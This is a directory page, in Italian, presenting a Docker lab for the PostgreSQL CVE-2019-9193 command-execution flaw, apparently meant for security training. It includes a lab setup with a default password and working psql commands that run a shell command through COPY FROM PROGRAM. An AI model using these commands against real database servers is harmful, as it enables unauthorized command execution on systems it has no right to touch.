Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2019-9193byVulHub — Laboratorio basato su Docker che dimostra CVE-2019-9193: esecuzione arbitraria di comandi di PostgreSQL tramite COPY FROM PROGRAM, con Proof of Concept (PoC) passo passo per test di sicurezza e formazione. | Kitploit
Strumenti/GitHubGitHub/corsisechero/cve-2019-9193byvulhub
Analisi delle VulnerabilitàExploitPenetration TestingApprendimento e FormazioneSicurezza dei DatabaseLab e Pratica
GitHubcorsisechero/cve-2019-9193byvulhub

CVE-2019-9193byVulHub

Laboratorio basato su Docker che dimostra CVE-2019-9193: esecuzione arbitraria di comandi di PostgreSQL tramite COPY FROM PROGRAM, con Proof of Concept (PoC) passo passo per test di sicurezza e formazione.

Vedi Repository
231 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2019-9193byVulHub


PostgreSQL Arbitrary Command Execution with Admin Privileges (CVE-2019-9193)

Descrizione

PostgreSQL è un potente sistema di gestione di database relazionale open-source. Una vulnerabilità presente nelle versioni dalla 9.3 alla 11 consente agli amministratori o agli utenti con i privilegi COPY TO/FROM PROGRAM di eseguire comandi arbitrari sul sistema.

Riferimenti:

  • GitHub - Vulhub - PostgreSQL CVE-2019-9193
  • Greenwolf Security - Authenticated Arbitrary Command Execution on PostgreSQL 9.3 - Latest

Configurazione dell'ambiente

Docker Compose file (docker-compose.yml)

Crea un file docker-compose.yml con il seguente contenuto:

version: '2'
services:
 postgres:
   image: vulhub/postgres:10.7
   ports:
    - "5432:5432"
   environment:
    - POSTGRES_PASSWORD=postgres

Avvio del container PostgreSQL

Esegui il container con il seguente comando:

docker compose up -d

Verifica che il container sia in esecuzione:

docker ps

L'output dovrebbe mostrare il container PostgreSQL in ascolto sulla porta 5432.


Esecuzione dell'exploit senza entrare nel container

1. Installazione del client PostgreSQL

Se non hai il client psql installato, puoi farlo con:

  • Kali:
    apt-get install postgresql-client
    

2. Connessione al database da riga di comando

Collegati al database direttamente da Kali:

psql -h localhost -p 5432 -U postgres

Ti verrà richiesta la password, inserisci:

postgres

3. Esecuzione del PoC (Proof of Concept)

Una volta connesso alla console PostgreSQL, esegui i seguenti comandi per sfruttare la vulnerabilità:

-- Elimina la tabella se esiste
DROP TABLE IF EXISTS cmd_exec;

-- Crea una nuova tabella per memorizzare l'output del comando
CREATE TABLE cmd_exec(cmd_output text);

-- Esegui il comando 'id' tramite la funzione COPY FROM PROGRAM
COPY cmd_exec FROM PROGRAM 'id';

-- Visualizza l'output del comando
SELECT * FROM cmd_exec;

4. Esecuzione del comando da riga di comando (senza shell interattiva)

Puoi eseguire tutto direttamente dalla riga di comando:

psql -h localhost -p 5432 -U postgres -c "DROP TABLE IF EXISTS cmd_exec; CREATE TABLE cmd_exec(cmd_output text); COPY cmd_exec FROM PROGRAM 'id'; SELECT * FROM cmd_exec;"

Verifica dell'output

Se l'exploit è riuscito, dovresti vedere un output simile:

       cmd_output
-------------------------
 uid=999(postgres) gid=999(postgres) groups=999(postgres)
(1 row)

Uscita dalla console PostgreSQL

Premi \q per uscire:

\q

Note di sicurezza

Questa vulnerabilità permette l'esecuzione arbitraria di comandi con privilegi amministrativi. Utilizzala solo in ambienti controllati e a scopo di studio o verifica. Sfruttare questa vulnerabilità su sistemi non autorizzati è illegale.


---
Scarica lo strumento